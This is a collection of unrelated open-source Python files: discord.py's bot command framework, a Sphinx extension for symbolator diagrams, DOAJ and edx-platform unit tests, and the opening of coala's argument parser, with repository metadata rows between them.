LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
import asyncio
import discord
import inspect
import importlib
import sys
import traceback
import re
from .core import GroupMixin, Command, command
from .view import StringView
from .context import Context
from .errors import CommandNotFound, CommandError
from .formatter import HelpFormatter
def when_mentioned(bot, msg):
"""A callable that implements a command prefix equivalent
to being mentioned, e.g. ``@bot ``."""
guild = msg.guild
if guild is not None:
return '{0.me.mention} '.format(guild)
return '{0.user.mention} '.format(bot)
def when_mentioned_or(*prefixes):
"""A callable that implements when mentioned or other prefixes provided.
Example
--------
.. code-block:: python
bot = commands.Bot(command_prefix=commands.when_mentioned_or('!'))
See Also
----------
:func:`when_mentioned`
"""
def inner(bot, msg):
r = list(prefixes)
r.append(when_mentioned(bot, msg))
return r
return inner
_mentions_transforms = {
'@everyone': '@\u200beveryone',
'@here': '@\u200bhere'
}
_mention_pattern = re.compile('|'.join(_mentions_transforms.keys()))
@asyncio.coroutine
def _default_help_command(ctx, *commands : str):
"""Shows this message."""
bot = ctx.bot
destination = ctx.message.author if bot.pm_help else ctx.message.channel
def repl(obj):
return _mentions_transforms.get(obj.group(0), '')
# help by itself just lists our own commands.
if len(commands) == 0:
pages = yield from bot.formatter.format_help_for(ctx, bot)
elif len(commands) == 1:
# try to see if it is a cog name
name = _mention_pattern.sub(repl, commands[0])
command = None
if name in bot.cogs:
command = bot.cogs[name]
else:
command = bot.commands.get(name)
if command is None:
yield from destination.send(bot.command_not_found.format(name))
return
pages = yield from bot.formatter.format_help_for(ctx, command)
else:
name = _mention_pattern.sub(repl, commands[0])
command = bot.commands.get(name)
if command is None:
yield from destination.send(bot.command_not_found.format(name))
return
for key in commands[1:]:
try:
key = _mention_pattern.sub(repl, key)
command = command.commands.get(key)
if command is None:
yield from destination.send(bot.command_not_found.format(key))
return
except AttributeError:
yield from destination.send(bot.command_has_no_subcommands.format(command, key))
return
pages = yield from bot.formatter.format_help_for(ctx, command)
if bot.pm_help is None:
characters = sum(map(lambda l: len(l), pages))
# modify destination based on length of pages.
if characters > 1000:
destination = ctx.message.author
for page in pages:
yield from destination.send(page)
class BotBase(GroupMixin):
def __init__(self, command_prefix, formatter=None, description=None, pm_help=False, **options):
super().__init__(**options)
self.command_prefix = command_prefix
self.extra_events = {}
self.cogs = {}
self.extensions = {}
self._checks = []
self._before_invoke = None
self._after_invoke = None
self.description = inspect.cleandoc(description) if description else ''
self.pm_help = pm_help
self.command_not_found = options.pop('command_not_found', 'No command called "{}" found.')
self.command_has_no_subcommands = options.pop('command_has_no_subcommands', 'Command {0.name} has no subcommands.')
if options.pop('self_bot', False):
self._skip_check = lambda x, y: x != y
else:
self._skip_check = lambda x, y: x == y
self.help_attrs = options.pop('help_attrs', {})
self.help_attrs['pass_context'] = True
if 'name' not in self.help_attrs:
self.help_attrs['name'] = 'help'
if formatter is not None:
if not isinstance(formatter, HelpFormatter):
raise discord.ClientException('Formatter must be a subclass of HelpFormatter')
self.formatter = formatter
else:
self.formatter = HelpFormatter()
# pay no mind to this ugliness.
self.command(**self.help_attrs)(_default_help_command)
# internal helpers
def dispatch(self, event_name, *args, **kwargs):
super().dispatch(event_name, *args, **kwargs)
ev = 'on_' + event_name
for event in self.extra_events.get(ev, []):
coro = self._run_event(event, event_name, *args, **kwargs)
discord.compat.create_task(coro, loop=self.loop)
@asyncio.coroutine
def close(self):
for extension in tuple(self.extensions):
try:
self.unload_extension(extension)
except:
pass
for cog in tuple(self.cogs):
try:
self.remove_cog(cog)
except:
pass
yield from super().close()
@asyncio.coroutine
def on_command_error(self, exception, context):
"""|coro|
The default command error handler provided by the bot.
By default this prints to ``sys.stderr`` however it could be
overridden to have a different implementation.
This only fires if you do not specify any listeners for command error.
"""
if self.extra_events.get('on_command_error', None):
return
if hasattr(context.command, "on_error"):
return
print('Ignoring exception in command {}'.format(context.command), file=sys.stderr)
traceback.print_exception(type(exception), exception, exception.__traceback__, file=sys.stderr)
# global check registration
def check(self, func):
"""A decorator that adds a global check to the bot.
A global check is similar to a :func:`check` that is applied
on a per command basis except it is run before any command checks
have been verified and applies to every command the bot has.
.. info::
This function can either be a regular function or a coroutine.
Similar to a command :func:`check`\, this takes a single parameter
of type :class:`Context` and can only raise exceptions derived from
:exc:`CommandError`.
Example
---------
.. code-block:: python
@bot.check
def whitelist(ctx):
return ctx.message.author.id in my_whitelist
"""
self.add_check(func)
return func
def add_check(self, func):
"""Adds a global check to the bot.
This is the non-decorator interface to :meth:`check`.
Parameters
-----------
func
The function that was used as a global check.
"""
self._checks.append(func)
def remove_check(self, func):
"""Removes a global check from the bot.
This function is idempotent and will not raise an exception
if the function is not in the global checks.
Parameters
-----------
func
The function to remove from the global checks.
"""
try:
self._checks.remove(func)
except ValueError:
pass
@asyncio.coroutine
def can_run(self, ctx):
if len(self._checks) == 0:
return True
return (yield from discord.utils.async_all(f(ctx) for f in self._checks))
def before_invoke(self, coro):
"""A decorator that registers a coroutine as a pre-invoke hook.
A pre-invoke hook is called directly before the command is
called. This makes it a useful function to set up database
connections or any type of set up required.
This pre-invoke hook takes a sole parameter, a :class:`Context`.
.. note::
The :meth:`before_invoke` and :meth:`after_invoke` hooks are
only called if all checks and argument parsing procedures pass
without error. If any check or argument parsing procedures fail
then the hooks are not called.
Parameters
-----------
coro
The coroutine to register as the pre-invoke hook.
Raises
-------
discord.ClientException
The coroutine is not actually a coroutine.
"""
if not asyncio.iscoroutinefunction(coro):
raise discord.ClientException('The error handler must be a coroutine.')
self._before_invoke = coro
return coro
def after_invoke(self, coro):
"""A decorator that registers a coroutine as a post-invoke hook.
A post-invoke hook is called directly after the command is
called. This makes it a useful function to clean-up database
connections or any type of clean up required.
This post-invoke hook takes a sole parameter, a :class:`Context`.
.. note::
Similar to :meth:`before_invoke`\, this is not called unless
checks and argument parsing procedures succeed. This hook is,
however, **always** called regardless of the internal command
callback raising an error (i.e. :exc:`CommandInvokeError`\).
This makes it ideal for clean-up scenarios.
Parameters
-----------
coro
The coroutine to register as the post-invoke hook.
Raises
-------
discord.ClientException
The coroutine is not actually a coroutine.
"""
if not asyncio.iscoroutinefunction(coro):
raise discord.ClientException('The error handler must be a coroutine.')
self._after_invoke = coro
return coro
# listener registration
def add_listener(self, func, name=None):
"""The non decorator alternative to :meth:`listen`.
Parameters
-----------
func : coroutine
The extra event to listen to.
name : Optional[str]
The name of the command to use. Defaults to ``func.__name__``.
Example
--------
.. code-block:: python
async def on_ready(): pass
async def my_message(message): pass
bot.add_listener(on_ready)
bot.add_listener(my_message, 'on_message')
"""
name = func.__name__ if name is None else name
if not asyncio.iscoroutinefunction(func):
raise discord.ClientException('Listeners must be coroutines')
if name in self.extra_events:
self.extra_events[name].append(func)
else:
self.extra_events[name] = [func]
def remove_listener(self, func, name=None):
"""Removes a listener from the pool of listeners.
Parameters
-----------
func
The function that was used as a listener to remove.
name
The name of the event we want to remove. Defaults to
``func.__name__``.
"""
name = func.__name__ if name is None else name
if name in self.extra_events:
try:
self.extra_events[name].remove(func)
except ValueError:
pass
def listen(self, name=None):
"""A decorator that registers another function as an external
event listener. Basically this allows you to listen to multiple
events from different places e.g. such as :func:`discord.on_ready`
The functions being listened to must be a coroutine.
Example
--------
.. code-block:: python
@bot.listen()
async def on_message(message):
print('one')
# in some other file...
@bot.listen('on_message')
async def my_message(message):
print('two')
Would print one and two in an unspecified order.
Raises
-------
discord.ClientException
The function being listened to is not a coroutine.
"""
def decorator(func):
self.add_listener(func, name)
return func
return decorator
# cogs
def add_cog(self, cog):
"""Adds a "cog" to the bot.
A cog is a class that has its own event listeners and commands.
They are meant as a way to organize multiple relevant commands
into a singular class that shares some state or no state at all.
The cog can also have a ``__global_check`` member function that allows
you to define a global check. See :meth:`check` for more info.
More information will be documented soon.
Parameters
-----------
cog
The cog to register to the bot.
"""
self.cogs[type(cog).__name__] = cog
try:
check = getattr(cog, '_{.__class__.__name__}__global_check'.format(cog))
except AttributeError:
pass
else:
self.add_check(check)
members = inspect.getmembers(cog)
for name, member in members:
# register commands the cog has
if isinstance(member, Command):
if member.parent is None:
self.add_command(member)
continue
# register event listeners the cog has
if name.startswith('on_'):
self.add_listener(member, name)
def get_cog(self, name):
"""Gets the cog instance requested.
If the cog is not found, ``None`` is returned instead.
Parameters
-----------
name : str
The name of the cog you are requesting.
"""
return self.cogs.get(name)
def remove_cog(self, name):
"""Removes a cog from the bot.
All registered commands and event listeners that the
cog has registered will be removed as well.
If no cog is found then ``None`` is returned, otherwise
the cog instance that is being removed is returned.
If the cog defines a special member function named ``__unload``
then it is called when removal has completed. This function
**cannot** be a coroutine. It must be a regular function.
Parameters
-----------
name : str
The name of the cog to remove.
"""
cog = self.cogs.pop(name, None)
if cog is None:
return cog
members = inspect.getmembers(cog)
for name, member in members:
# remove commands the cog has
if isinstance(member, Command):
if member.parent is None:
self.remove_command(member.name)
continue
# remove event listeners the cog has
if name.startswith('on_'):
self.remove_listener(member)
try:
check = getattr(cog, '_{0.__class__.__name__}__global_check'.format(cog))
except AttributeError:
pass
else:
self.remove_check(check)
unloader_name = '_{0.__class__.__name__}__unload'.format(cog)
try:
unloader = getattr(cog, unloader_name)
except AttributeError:
pass
else:
unloader()
del cog
# extensions
def load_extension(self, name):
if name in self.extensions:
return
lib = importlib.import_module(name)
if not hasattr(lib, 'setup'):
del lib
del sys.modules[name]
raise discord.ClientException('extension does not have a setup function')
lib.setup(self)
self.extensions[name] = lib
def unload_extension(self, name):
lib = self.extensions.get(name)
if lib is None:
return
# find all references to the module
# remove the cogs registered from the module
for cogname, cog in self.cogs.copy().items():
if inspect.getmodule(cog) is lib:
self.remove_cog(cogname)
# first remove all the commands from the module
for command in self.commands.copy().values():
if command.module is lib:
command.module = None
if isinstance(command, GroupMixin):
command.recursively_remove_all_commands()
self.remove_command(command.name)
# then remove all the listeners from the module
for event_list in self.extra_events.copy().values():
remove = []
for index, event in enumerate(event_list):
if inspect.getmodule(event) is lib:
remove.append(index)
for index in reversed(remove):
del event_list[index]
try:
func = getattr(lib, 'teardown')
except AttributeError:
pass
else:
try:
func(self)
except:
pass
finally:
# finally remove the import..
del lib
del self.extensions[name]
del sys.modules[name]
# command processing
@asyncio.coroutine
def get_prefix(self, message):
"""|coro|
Retrieves the prefix the bot is listening to
with the message as a context.
Parameters
-----------
message: :class:`discord.Message`
The message context to get the prefix of.
Returns
--------
Union[List[str], str]
A list of prefixes or a single prefix that the bot is
listening for.
"""
prefix = self.command_prefix
if callable(prefix):
ret = prefix(self, message)
if asyncio.iscoroutine(ret):
ret = yield from ret
return ret
else:
return prefix
@asyncio.coroutine
def get_context(self, message, *, cls=Context):
"""|coro|
Returns the invocation context from the message.
This is a more low-level counter-part for :meth:`process_message`
to allow users more fine grained control over the processing.
The returned context is not guaranteed to be a valid invocation
context, :attr:`Context.valid` must be checked to make sure it is.
If the context is not valid then it is not a valid candidate to be
invoked under :meth:`invoke`.
Parameters
-----------
message: :class:`discord.Message`
The message to get the invocation context from.
cls: type
The factory class that will be used to create the context.
By default, this is :class:`Context`. Should a custom
class be provided, it must be similar enough to :class:`Context`\'s
interface.
Returns
--------
:class:`Context`
The invocation context. The type of this can change via the
``cls`` parameter.
"""
view = StringView(message.content)
ctx = cls(prefix=None, view=view, bot=self, message=message)
if self._skip_check(message.author.id, self.user.id):
return ctx
prefix = yield from self.get_prefix(message)
invoked_prefix = prefix
if not isinstance(prefix, (tuple, list)):
if not view.skip_string(prefix):
return ctx
else:
invoked_prefix = discord.utils.find(view.skip_string, prefix)
if invoked_prefix is None:
return ctx
invoker = view.get_word()
ctx.invoked_with = invoker
ctx.prefix = invoked_prefix
ctx.command = self.commands.get(invoker)
return ctx
@asyncio.coroutine
def invoke(self, ctx):
"""|coro|
Invokes the command given under the invocation context and
handles all the internal event dispatch mechanisms.
Parameters
-----------
ctx: :class:`Context`
The invocation context to invoke.
"""
if ctx.command is not None:
self.dispatch('command', ctx)
try:
yield from ctx.command.invoke(ctx)
except CommandError as e:
yield from ctx.command.dispatch_error(e, ctx)
else:
ctx.command_failed = False
self.dispatch('command_completion', ctx)
elif ctx.invoked_with:
exc = CommandNotFound('Command "{}" is not found'.format(ctx.invoked_with))
self.dispatch('command_error', exc, ctx)
@asyncio.coroutine
def process_commands(self, message):
"""|coro|
This function processes the commands that have been registered
to the bot and other groups. Without this coroutine, none of the
commands will be triggered.
By default, this coroutine is called inside the :func:`on_message`
event. If you choose to override the :func:`on_message` event, then
you should invoke this coroutine as well.
This is built using other low level tools, and is equivalent to a
call to :meth:`get_context` followed by a call to :meth:`invoke`.
Parameters
-----------
message : discord.Message
The message to process commands for.
"""
ctx = yield from self.get_context(message)
yield from self.invoke(ctx)
@asyncio.coroutine
def on_message(self, message):
yield from self.process_commands(message)
class Bot(BotBase, discord.Client):
"""Represents a discord bot.
This class is a subclass of :class:`discord.Client` and as a result
anything that you can do with a :class:`discord.Client` you can do with
this bot.
This class also subclasses :class:`GroupMixin` to provide the functionality
to manage commands.
Attributes
-----------
command_prefix
The command prefix is what the message content must contain initially
to have a command invoked. This prefix could either be a string to
indicate what the prefix should be, or a callable that takes in the bot
as its first parameter and :class:`discord.Message` as its second
parameter and returns the prefix. This is to facilitate "dynamic"
command prefixes. This callable can be either a regular function or
a coroutine.
The command prefix could also be a list or a tuple indicating that
multiple checks for the prefix should be used and the first one to
match will be the invocation prefix. You can get this prefix via
:attr:`Context.prefix`.
description : str
The content prefixed into the default help message.
self_bot : bool
If ``True``, the bot will only listen to commands invoked by itself rather
than ignoring itself. If ``False`` (the default) then the bot will ignore
itself. This cannot be changed once initialised.
formatter : :class:`HelpFormatter`
The formatter used to format the help message. By default, it uses a
the :class:`HelpFormatter`. Check it for more info on how to override it.
If you want to change the help command completely (add aliases, etc) then
a call to :meth:`remove_command` with 'help' as the argument would do the
trick.
pm_help : Optional[bool]
A tribool that indicates if the help command should PM the user instead of
sending it to the channel it received it from. If the boolean is set to
``True``, then all help output is PM'd. If ``False``, none of the help
output is PM'd. If ``None``, then the bot will only PM when the help
message becomes too long (dictated by more than 1000 characters).
Defaults to ``False``.
help_attrs : dict
A dictionary of options to pass in for the construction of the help command.
This allows you to change the command behaviour without actually changing
the implementation of the command. The attributes will be the same as the
ones passed in the :class:`Command` constructor. Note that ``pass_context``
will always be set to ``True`` regardless of what you pass in.
command_not_found : str
The format string used when the help command is invoked with a command that
is not found. Useful for i18n. Defaults to ``"No command called {} found."``.
The only format argument is the name of the command passed.
command_has_no_subcommands : str
The format string used when the help command is invoked with requests for a
subcommand but the command does not have any subcommands. Defaults to
``"Command {0.name} has no subcommands."``. The first format argument is the
:class:`Command` attempted to get a subcommand and the second is the name.
"""
pass
class AutoShardedBot(BotBase, discord.AutoShardedClient):
"""This is similar to :class:`Bot` except that it is derived from
:class:`discord.AutoShardedClient` instead.
"""
pass
| mit | -222,379,513,342,976,670 | 32.17 | 123 | 0.599525 | false |
kevinpt/symbolator | symbolator_sphinx/symbolator_sphinx.py | 1 | 11655 | # -*- coding: utf-8 -*-
"""
symbolator_sphinx
~~~~~~~~~~~~~~~~~
Allow symbolator-formatted graphs to be included in Sphinx-generated
documents inline.
Derived from sphinx.ext.graphviz.
:copyright: Copyright 2007-2017 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE.Sphinx for details.
"""
import re
import codecs
import posixpath
from os import path
from subprocess import Popen, PIPE
from hashlib import sha1
from six import text_type
from docutils import nodes
from docutils.parsers.rst import Directive, directives
from docutils.statemachine import ViewList
import sphinx
from sphinx.errors import SphinxError
from sphinx.locale import _, __
from sphinx.util import logging
from sphinx.util.i18n import search_image_for_language
from sphinx.util.osutil import ensuredir, ENOENT, EPIPE, EINVAL
if False:
# For type annotation
from typing import Any, Dict, List, Tuple # NOQA
from sphinx.application import Sphinx # NOQA
logger = logging.getLogger(__name__)
class SymbolatorError(SphinxError):
category = 'Symbolator error'
class symbolator(nodes.General, nodes.Inline, nodes.Element):
'''Base class for symbolator node'''
pass
def figure_wrapper(directive, node, caption):
# type: (Directive, nodes.Node, unicode) -> nodes.figure
figure_node = nodes.figure('', node)
if 'align' in node:
figure_node['align'] = node.attributes.pop('align')
parsed = nodes.Element()
directive.state.nested_parse(ViewList([caption], source=''),
directive.content_offset, parsed)
caption_node = nodes.caption(parsed[0].rawsource, '',
*parsed[0].children)
caption_node.source = parsed[0].source
caption_node.line = parsed[0].line
figure_node += caption_node
return figure_node
def align_spec(argument):
# type: (Any) -> bool
return directives.choice(argument, ('left', 'center', 'right'))
class Symbolator(Directive):
"""
Directive to insert HDL symbol.
"""
has_content = True
required_arguments = 0
optional_arguments = 1
final_argument_whitespace = False
option_spec = {
'alt': directives.unchanged,
'align': align_spec,
'caption': directives.unchanged,
'symbolator_cmd': directives.unchanged,
'name': directives.unchanged,
}
def run(self):
# type: () -> List[nodes.Node]
if self.arguments:
document = self.state.document
if self.content:
return [document.reporter.warning(
__('Symbolator directive cannot have both content and '
'a filename argument'), line=self.lineno)]
env = self.state.document.settings.env
argument = search_image_for_language(self.arguments[0], env)
rel_filename, filename = env.relfn2path(argument)
env.note_dependency(rel_filename)
try:
with codecs.open(filename, 'r', 'utf-8') as fp:
symbolator_code = fp.read()
except (IOError, OSError):
return [document.reporter.warning(
__('External Symbolator file %r not found or reading '
'it failed') % filename, line=self.lineno)]
else:
symbolator_code = '\n'.join(self.content)
if not symbolator_code.strip():
return [self.state_machine.reporter.warning(
__('Ignoring "symbolator" directive without content.'),
line=self.lineno)]
node = symbolator()
node['code'] = symbolator_code
node['options'] = {}
if 'symbolator_cmd' in self.options:
node['options']['symbolator_cmd'] = self.options['symbolator_cmd']
if 'alt' in self.options:
node['alt'] = self.options['alt']
if 'align' in self.options:
node['align'] = self.options['align']
if 'name' in self.options:
node['options']['name'] = self.options['name']
caption = self.options.get('caption')
if caption:
node = figure_wrapper(self, node, caption)
self.add_name(node)
return [node]
def render_symbol(self, code, options, format, prefix='symbol'):
# type: (nodes.NodeVisitor, unicode, Dict, unicode, unicode) -> Tuple[unicode, unicode]
"""Render symbolator code into a PNG or SVG output file."""
symbolator_cmd = options.get('symbolator_cmd', self.builder.config.symbolator_cmd)
hashkey = (code + str(options) + str(symbolator_cmd) +
str(self.builder.config.symbolator_cmd_args)).encode('utf-8')
# Use name option if present otherwise fallback onto SHA-1 hash
name = options.get('name', sha1(hashkey).hexdigest())
fname = '%s-%s.%s' % (prefix, name, format)
relfn = posixpath.join(self.builder.imgpath, fname)
outfn = path.join(self.builder.outdir, self.builder.imagedir, fname)
if path.isfile(outfn):
return relfn, outfn
if (hasattr(self.builder, '_symbolator_warned_cmd') and
self.builder._symbolator_warned_cmd.get(symbolator_cmd)):
return None, None
ensuredir(path.dirname(outfn))
# Symbolator expects UTF-8 by default
if isinstance(code, text_type):
code = code.encode('utf-8')
cmd_args = [symbolator_cmd]
cmd_args.extend(self.builder.config.symbolator_cmd_args)
cmd_args.extend(['-i', '-', '-f', format, '-o', outfn])
try:
p = Popen(cmd_args, stdout=PIPE, stdin=PIPE, stderr=PIPE)
except OSError as err:
if err.errno != ENOENT: # No such file or directory
raise
logger.warning('symbolator command %r cannot be run (needed for symbolator '
'output), check the symbolator_cmd setting', symbolator_cmd)
if not hasattr(self.builder, '_symbolator_warned_cmd'):
self.builder._symbolator_warned_cmd = {}
self.builder._symbolator_warned_cmd[symbolator_cmd] = True
return None, None
try:
# Symbolator may close standard input when an error occurs,
# resulting in a broken pipe on communicate()
stdout, stderr = p.communicate(code)
except (OSError, IOError) as err:
if err.errno not in (EPIPE, EINVAL):
raise
# in this case, read the standard output and standard error streams
# directly, to get the error message(s)
stdout, stderr = p.stdout.read(), p.stderr.read()
p.wait()
if p.returncode != 0:
raise SymbolatorError('symbolator exited with error:\n[stderr]\n%s\n'
'[stdout]\n%s' % (stderr, stdout))
if not path.isfile(outfn):
raise SymbolatorError('symbolator did not produce an output file:\n[stderr]\n%s\n'
'[stdout]\n%s' % (stderr, stdout))
return relfn, outfn
def render_symbol_html(self, node, code, options, prefix='symbol',
imgcls=None, alt=None):
# type: (nodes.NodeVisitor, symbolator, unicode, Dict, unicode, unicode, unicode) -> Tuple[unicode, unicode] # NOQA
format = self.builder.config.symbolator_output_format
try:
if format not in ('png', 'svg'):
raise SymbolatorError("symbolator_output_format must be one of 'png', "
"'svg', but is %r" % format)
fname, outfn = render_symbol(self, code, options, format, prefix)
except SymbolatorError as exc:
logger.warning('symbolator code %r: ' % code + str(exc))
raise nodes.SkipNode
if fname is None:
self.body.append(self.encode(code))
else:
if alt is None:
alt = node.get('alt', self.encode(code).strip())
imgcss = imgcls and 'class="%s"' % imgcls or ''
if format == 'svg':
svgtag = '''<object data="%s" type="image/svg+xml">
<p class="warning">%s</p></object>\n''' % (fname, alt)
self.body.append(svgtag)
else:
if 'align' in node:
self.body.append('<div align="%s" class="align-%s">' %
(node['align'], node['align']))
self.body.append('<img src="%s" alt="%s" %s/>\n' %
(fname, alt, imgcss))
if 'align' in node:
self.body.append('</div>\n')
raise nodes.SkipNode
def html_visit_symbolator(self, node):
# type: (nodes.NodeVisitor, symbolator) -> None
render_symbol_html(self, node, node['code'], node['options'])
def render_symbol_latex(self, node, code, options, prefix='symbol'):
# type: (nodes.NodeVisitor, symbolator, unicode, Dict, unicode) -> None
try:
fname, outfn = render_symbol(self, code, options, 'pdf', prefix)
except SymbolatorError as exc:
logger.warning('symbolator code %r: ' % code + str(exc))
raise nodes.SkipNode
is_inline = self.is_inline(node)
if is_inline:
para_separator = ''
else:
para_separator = '\n'
if fname is not None:
post = None # type: unicode
if not is_inline and 'align' in node:
if node['align'] == 'left':
self.body.append('{')
post = '\\hspace*{\\fill}}'
elif node['align'] == 'right':
self.body.append('{\\hspace*{\\fill}')
post = '}'
self.body.append('%s\\includegraphics{%s}%s' %
(para_separator, fname, para_separator))
if post:
self.body.append(post)
raise nodes.SkipNode
def latex_visit_symbolator(self, node):
# type: (nodes.NodeVisitor, symbolator) -> None
render_symbol_latex(self, node, node['code'], node['options'])
def render_symbol_texinfo(self, node, code, options, prefix='symbol'):
# type: (nodes.NodeVisitor, symbolator, unicode, Dict, unicode) -> None
try:
fname, outfn = render_symbol(self, code, options, 'png', prefix)
except SymbolatorError as exc:
logger.warning('symbolator code %r: ' % code + str(exc))
raise nodes.SkipNode
if fname is not None:
self.body.append('@image{%s,,,[symbolator],png}\n' % fname[:-4])
raise nodes.SkipNode
def texinfo_visit_symbolator(self, node):
# type: (nodes.NodeVisitor, symbolator) -> None
render_symbol_texinfo(self, node, node['code'], node['options'])
def text_visit_symbolator(self, node):
# type: (nodes.NodeVisitor, symbolator) -> None
if 'alt' in node.attributes:
self.add_text(_('[symbol: %s]') % node['alt'])
else:
self.add_text(_('[symbol]'))
raise nodes.SkipNode
def man_visit_symbolator(self, node):
# type: (nodes.NodeVisitor, symbolator) -> None
if 'alt' in node.attributes:
self.body.append(_('[symbol: %s]') % node['alt'])
else:
self.body.append(_('[symbol]'))
raise nodes.SkipNode
def setup(app):
# type: (Sphinx) -> Dict[unicode, Any]
app.add_node(symbolator,
html=(html_visit_symbolator, None),
latex=(latex_visit_symbolator, None),
texinfo=(texinfo_visit_symbolator, None),
text=(text_visit_symbolator, None),
man=(man_visit_symbolator, None))
app.add_directive('symbolator', Symbolator)
app.add_config_value('symbolator_cmd', 'symbolator', 'html')
app.add_config_value('symbolator_cmd_args', ['-t'], 'html')
app.add_config_value('symbolator_output_format', 'svg', 'html')
return {'version': '1.0', 'parallel_read_safe': True}
| mit | -7,638,436,865,975,615,000 | 35.083591 | 120 | 0.599399 | false |
DOAJ/doaj | doajtest/unit/test_upgrade.py | 1 | 2252 | import json
import time
import re
from collections import OrderedDict
from doajtest.helpers import DoajTestCase
from portality import models
from portality.upgrade import do_upgrade
from portality.lib.paths import rel2abs
def operation(journal):
j = models.Journal.pull(journal.id)
bj = j.bibjson()
bj.title = "Updated Title"
j.save()
return j
class TestUpgrade(DoajTestCase):
def test_upgrade(self):
# populate the index with some journals with title
saved_journals = {}
for i in range(5):
j = models.Journal()
j.set_in_doaj(True)
bj = j.bibjson()
bj.title = "Test Journal"
bj.add_identifier(bj.P_ISSN, "{x}000-0000".format(x=i))
bj.publisher = "Test Publisher {x}".format(x=i)
bj.add_url("http://homepage.com/{x}".format(x=i), "homepage")
j.save()
saved_journals[j.id] = j.last_updated
# and with some journals without title
for i in range(5):
j = models.Journal()
j.set_in_doaj(True)
bj = j.bibjson()
bj.add_identifier(bj.P_ISSN, "{x}000-0001".format(x=i))
bj.title = "Journal to Change"
bj.publisher = "Test Publisher {x}".format(x=i)
bj.add_url("http://homepage.com/{x}".format(x=i), "homepage")
j.save()
saved_journals[j.id] = j.last_updated
# make sure the last updated dates will be suitably different after migration
time.sleep(1.5)
path =rel2abs(__file__, ".", "resources", "migrate.json")
with open(path) as f:
instructions = json.loads(f.read(), object_pairs_hook=OrderedDict)
do_upgrade(instructions,None)
p = re.compile('[0-4]000-0001')
for id in saved_journals:
j = models.Journal.pull(id)
bj = j.bibjson()
pissn = bj.get_one_identifier(bj.P_ISSN)
if not p.match(pissn):
assert bj.title == "Test Journal"
assert j.last_updated == saved_journals[j.id]
else:
assert bj.title == "Updated Title"
assert not j.last_updated == saved_journals[j.id]
| apache-2.0 | 5,705,412,087,984,378,000 | 27.506329 | 85 | 0.567496 | false |
ESOedX/edx-platform | openedx/core/djangoapps/schedules/management/commands/tests/test_send_course_update.py | 1 | 4396 | """
Tests for send_course_update management command.
"""
from __future__ import absolute_import
from unittest import skipUnless
import ddt
from django.conf import settings
from edx_ace.utils.date import serialize
from mock import patch
from six.moves import range
from openedx.core.djangoapps.schedules import resolvers, tasks
from openedx.core.djangoapps.schedules.config import COURSE_UPDATE_WAFFLE_FLAG
from openedx.core.djangoapps.schedules.management.commands import send_course_update as nudge
from openedx.core.djangoapps.schedules.management.commands.tests.send_email_base import (
ExperienceTest,
ScheduleSendEmailTestMixin
)
from openedx.core.djangoapps.schedules.management.commands.tests.upsell_base import ScheduleUpsellTestMixin
from openedx.core.djangoapps.schedules.models import ScheduleExperience
from openedx.core.djangoapps.waffle_utils.testutils import override_waffle_flag
from openedx.core.djangolib.testing.utils import skip_unless_lms
from student.tests.factories import CourseEnrollmentFactory
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory
@ddt.ddt
@skip_unless_lms
@skipUnless(
'openedx.core.djangoapps.schedules.apps.SchedulesConfig' in settings.INSTALLED_APPS,
"Can't test schedules if the app isn't installed",
)
class TestSendCourseUpdate(ScheduleUpsellTestMixin, ScheduleSendEmailTestMixin, ModuleStoreTestCase):
__test__ = True
# pylint: disable=protected-access
resolver = resolvers.CourseUpdateResolver
task = tasks.ScheduleCourseUpdate
deliver_task = tasks._course_update_schedule_send
command = nudge.Command
deliver_config = 'deliver_course_update'
enqueue_config = 'enqueue_course_update'
expected_offsets = list(range(-7, -77, -7))
experience_type = ScheduleExperience.EXPERIENCES.course_updates
queries_deadline_for_each_course = True
def setUp(self):
super(TestSendCourseUpdate, self).setUp()
self.highlights_patcher = patch('openedx.core.djangoapps.schedules.resolvers.get_week_highlights')
mock_highlights = self.highlights_patcher.start()
mock_highlights.return_value = [u'Highlight {}'.format(num + 1) for num in range(3)]
self.addCleanup(self.stop_highlights_patcher)
def stop_highlights_patcher(self):
"""
Stops the patcher for the get_week_highlights method
if the patch is still in progress.
"""
if self.highlights_patcher is not None:
self.highlights_patcher.stop()
@ddt.data(
ExperienceTest(experience=ScheduleExperience.EXPERIENCES.default, offset=expected_offsets[0], email_sent=False),
ExperienceTest(experience=ScheduleExperience.EXPERIENCES.course_updates, offset=expected_offsets[0], email_sent=True),
ExperienceTest(experience=None, offset=expected_offsets[0], email_sent=False),
)
def test_schedule_in_different_experience(self, test_config):
self._check_if_email_sent_for_experience(test_config)
@override_waffle_flag(COURSE_UPDATE_WAFFLE_FLAG, True)
@patch('openedx.core.djangoapps.schedules.signals.get_current_site')
def test_with_course_data(self, mock_get_current_site):
self.highlights_patcher.stop()
self.highlights_patcher = None
mock_get_current_site.return_value = self.site_config.site
course = CourseFactory(highlights_enabled_for_messaging=True, self_paced=True)
with self.store.bulk_operations(course.id):
ItemFactory.create(parent=course, category='chapter', highlights=[u'highlights'])
enrollment = CourseEnrollmentFactory(course_id=course.id, user=self.user, mode=u'audit')
self.assertEqual(enrollment.schedule.get_experience_type(), ScheduleExperience.EXPERIENCES.course_updates)
_, offset, target_day, _ = self._get_dates(offset=self.expected_offsets[0])
enrollment.schedule.start = target_day
enrollment.schedule.save()
with patch.object(tasks, 'ace') as mock_ace:
self.task().apply(kwargs=dict(
site_id=self.site_config.site.id,
target_day_str=serialize(target_day),
day_offset=offset,
bin_num=self._calculate_bin_for_user(enrollment.user),
))
self.assertTrue(mock_ace.send.called)
| agpl-3.0 | -5,302,609,191,891,175,000 | 42.96 | 126 | 0.734531 | false |
scriptnull/coala | coalib/parsing/DefaultArgParser.py | 1 | 6420 | import argparse
from coalib.misc import Constants
def default_arg_parser(formatter_class=None):
formatter_class = formatter_class or argparse.RawDescriptionHelpFormatter
arg_parser = argparse.ArgumentParser(
formatter_class=formatter_class,
prog="coala",
description="coala is a simple COde AnaLysis Application. Its goal "
"is to make static code analysis easy and convenient "
"for all languages. coala uses bears, which are analaysis "
"routines that can be combined arbitrarily.")
arg_parser.add_argument('TARGETS',
nargs='*',
help="Sections to be executed exclusively.")
arg_parser.add_argument('-c',
'--config',
nargs=1,
metavar='FILE',
help='Configuration file to be used, defaults to '
